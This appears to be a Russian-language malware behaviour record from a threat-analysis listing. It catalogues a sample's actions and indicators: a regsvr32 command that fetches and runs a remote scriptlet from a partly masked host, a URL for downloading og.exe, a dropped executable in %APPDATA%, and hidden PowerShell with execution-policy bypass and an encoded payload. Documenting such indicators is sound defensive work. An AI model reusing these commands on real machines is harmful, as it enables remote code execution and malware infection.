Техническая информация
- '<SYSTEM32>\regsvr32.exe' /s -n /u -i:http://lf###hosi.co.in///test.sct SCrObj.DLl
- %APPDATA%\wdm.exe
- http://lf###hosi.co.in///test.sct
- http://lf###hosi.co.in///og.exe
- DNS ASK lf###hosi.co.in
- '%APPDATA%\wdm.exe'
- '<SYSTEM32>\cmd.exe' "/C pOweRsheLL.eXe -eX ByPasS -noP -w 1 -EC JABzAFUAcABPAGgATgBxAGUAcgBnAEYAbQBkAEkAIAAgAAkAPQAJAAkAIABAACgAIgAxADEALgAwACIACQAgAAkALAAgAAkAIAAiADEAMgAuADAAIgAgAAkAIAAsAAkACQAJACIAM...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' "/C pOweRsheLL.eXe -eX ByPasS -noP -w 1 -EC JABzAFUAcABPAGgATgBxAGUAcgBnAEYAbQBkAEkAIAAgAAkAPQAJAAkAIABAACgAIgAxADEALgAwACIACQAgAAkALAAgAAkAIAAiADEAMgAuADAAIgAgAAkAIAAsAAkACQAJACIAM...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -eX ByPasS -noP -w 1 -EC JABzAFUAcABPAGgATgBxAGUAcgBnAEYAbQBkAEkAIAAgAAkAPQAJAAkAIABAACgAIgAxADEALgAwACIACQAgAAkALAAgAAkAIAAiADEAMgAuADAAIgAgAAkAIAAsAAkACQAJACIAMQA0AC4AMAAiAAkACQAgACwAIA...